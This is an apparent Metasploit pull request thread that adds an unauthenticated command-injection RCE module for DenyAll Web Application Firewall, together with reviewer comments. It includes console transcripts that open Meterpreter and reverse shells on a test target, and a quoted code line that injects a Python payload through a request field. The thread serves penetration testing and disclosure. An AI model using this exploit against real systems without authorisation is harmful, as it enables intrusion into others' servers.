Adding DenyAll Web Application Firewall RCE module
rapid7/metasploit-framework pull request #8980
Opened 2017-09-19 12:30 UTC by mmetince

This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a terminal command under the context of the web server user.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use use exploit/linux/http/denyall_exec`
- [ ] Set `RHOST`
- [ ] Set `LHOST`
- [ ] Run `check`
- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
- [ ] Run `exploit`
- [ ] **Verify** that you are seeing `iToken` value extraction.
- [ ] **Verify** that you are getting `meterpreter` session.

```
msf > use exploit/linux/http/denyall_exec 
msf exploit(denyall_exec) > 
msf exploit(denyall_exec) > set RHOST 35.176.123.128
RHOST => 35.176.123.128
msf exploit(denyall_exec) > set LHOST 35.12.3.3
LHOST => 35.12.3.3
msf exploit(denyall_exec) > check
[*] 35.176.123.128:3001 The target appears to be vulnerable.
msf exploit(denyall_exec) > exploit 

[*] Started reverse TCP handler on 35.12.3.3:4444 
[*] Extracting iToken value from unauthenticated accessible endpoint.
[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
[*] Trigerring command injection vulnerability with  iToken value.
[*] Sending stage (40411 bytes) to 35.176.123.128
[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300

meterpreter > pwd
/var/log/denyall/reverseproxy
meterpreter >
```

Here is the advisory and technical details about that vulnerability. 
[https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/](https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/)

2017-09-19 13:49 UTC, void-in commented on modules/exploits/linux/http/denyall_waf_exec.rb
> +    if res && res.code == 200 && res.body.include?("iToken")
This iToken extraction code should be moved to a separate method since the exact same code is also required for exploiting. We can save on a few lines of code.

2017-09-20 07:25 UTC, mmetince commented on modules/exploits/linux/http/denyall_waf_exec.rb
> +    if res && res.code == 200 && res.body.include?("iToken")
It's done and retested. Thank you very much for review.

2017-09-21 09:19 UTC, h00die commented
if i get some time over the weekend (which is likely) I've got my eye on this.

2017-09-21 17:11 UTC, h00die requested changes

2017-09-21 17:11 UTC, h00die commented on documentation/modules/exploit/linux/http/denyall_waf_exec.md
> +**Vulnerable Application Installation Steps**
For consistency I think you can remove this bold area and just let it all blend in to one.

2017-09-21 17:11 UTC, h00die commented on documentation/modules/exploit/linux/http/denyall_waf_exec.md
> +## Verification Steps
Verification steps should be like in your PR submission, https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/smb/ms17_010_eternalblue.md#verification-steps for an example

2017-09-21 17:11 UTC, h00die commented on documentation/modules/exploit/linux/http/denyall_waf_exec.md
> +A successful check of the exploit will look like this:
Add the heading of ```##Scenarios```

2017-09-21 17:11 UTC, h00die commented on modules/exploits/linux/http/denyall_waf_exec.rb
> +        This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a
user**s**

2017-09-21 17:11 UTC, h00die commented on modules/exploits/linux/http/denyall_waf_exec.rb
> +        OptString.new('TARGETURI', [true, 'The URI of the vulnerable Denyall WAF', '/'])
I think the A in all should be capitalized here for consistency of product name

2017-09-21 17:11 UTC, h00die commented on modules/exploits/linux/http/denyall_waf_exec.rb
> +        'tag' => "tunnel",
change " to '

2017-09-21 17:11 UTC, h00die commented on modules/exploits/linux/http/denyall_waf_exec.rb
> +    print_status("Trigerring command injection vulnerability with  iToken value.")
change " to '

2017-09-21 17:11 UTC, h00die commented on modules/exploits/linux/http/denyall_waf_exec.rb
> +    print_status("Trigerring command injection vulnerability with  iToken value.")
two spaces between with and itoken, remove the second

2017-09-21 17:11 UTC, h00die commented on modules/exploits/linux/http/denyall_waf_exec.rb
> +    print_status("Extracting iToken value")
change " to '

2017-09-21 17:11 UTC, h00die commented on modules/exploits/linux/http/denyall_waf_exec.rb
> +        'typeOf' => "debug"
change " to '

2017-09-21 17:11 UTC, h00die commented on modules/exploits/linux/http/denyall_waf_exec.rb
> +        'applianceUid' => "LOCALUID",
change " to '

2017-09-21 17:11 UTC, h00die commented on modules/exploits/linux/http/denyall_waf_exec.rb
> +        'type' => "#{r}$(python -c \"#{payload.encoded}\")"
if the server is php based, was there a particular reason why the default payload is python?  There is a php meterpreter, but didn't know if the php pushes to python or something like that where python would be the better option

2017-09-21 17:11 UTC, h00die commented on documentation/modules/exploit/linux/http/denyall_waf_exec.md
> +msf exploit(denyall_exec) > set RHOST 35.176.123.128
These look to be public IPs (unverified), you may want to change them to something else like 1.1.1.1 and 2.2.2.2

2017-09-21 20:48 UTC, mmetince commented on documentation/modules/exploit/linux/http/denyall_waf_exec.md
> +msf exploit(denyall_exec) > set RHOST 35.176.123.128
It was my AWS London instance IP that I've used for testing purpose. It's not alive anymore.

2017-09-21 20:54 UTC, mmetince commented on modules/exploits/linux/http/denyall_waf_exec.rb
> +        'type' => "#{r}$(python -c \"#{payload.encoded}\")"
Thanks for all the review @h00die. Nodejs, python and different type of technologies also being used by this product. Also, as far as I know python meterpreter has much more capabilities than the php, such as stdapi.

2017-09-21 21:08 UTC, h00die commented on modules/exploits/linux/http/denyall_waf_exec.rb
> +        'type' => "#{r}$(python -c \"#{payload.encoded}\")"
i'll give this a run over the weekend, i'll also try out the php payload, would be a good thing to note that it also works (for curious minds like myself who have encountered issues in the past)

2017-09-22 00:43 UTC, h00die approved these changes

2017-09-22 01:35 UTC, h00die commented
Worked fine for me!  I actually deployed 6.2.0.
```
msf > use exploit/linux/http/denyall_waf_exec 
msf exploit(denyall_waf_exec) > set rhost 1.1.1.1
rhost => 1.1.1.1
msf exploit(denyall_waf_exec) > set lhost 2.2.2.2
lhost => 2.2.2.2
msf exploit(denyall_waf_exec) > set reverselistenerbindaddress 3.3.3.3
reverselistenerbindaddress => 3.3.3.3
msf exploit(denyall_waf_exec) > set verbose true
verbose => true
msf exploit(denyall_waf_exec) > check
[*] 1.1.1.1:3001 The target appears to be vulnerable.
msf exploit(denyall_waf_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Extracting iToken value
[+] Awesome. iToken value = w12c319e6dfdcabe1af2488c84d07077
[*] Trigerring command injection vulnerability with iToken value.
[*] Sending stage (42231 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:13926) at 2017-09-21 21:22:02 -0400
[*] Sending stage (42231 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:13784) at 2017-09-21 21:22:09 -0400

meterpreter > sysinfo
Computer        : ip-172-31-34-108
OS              : Linux 3.10.0-327.36.1.el7.x86_64 #1 SMP Sun Sep 18 13:04:29 UTC 2016
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.31.34.108 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(denyall_waf_exec) > set payload generic/shell_reverse_tcp 
payload => generic/shell_reverse_tcp
msf exploit(denyall_waf_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Extracting iToken value
[+] Awesome. iToken value = w12c319e6dfdcabe1af2488c84d07077
[*] Trigerring command injection vulnerability with iToken value.
[*] Command shell session 3 opened (2.2.2.2:4444 -> 1.1.1.1:14236) at 2017-09-21 21:23:04 -0400
whoami
id

daactrl
uid=998(daactrl) gid=999(denyall) groups=999(denyall)
exit
```

2017-09-22 01:36 UTC, h00die commented
A few minor edits on the docs still left to do and i'll get this landed!

2017-09-22 01:39 UTC, h00die commented
i take it back, landing now.

2017-09-22 01:42 UTC, merged

2017-09-22 01:43 UTC, h00die commented
# Release Notes
This module adds an unauthenticated remote code execution exploit for DenyAll Web Application Firewall for versions 6.3.0 and 6.2.0

2017-09-22 01:44 UTC, h00die commented
Thanks for the contribution, looked pretty good from the start, and thanks for being so responsive!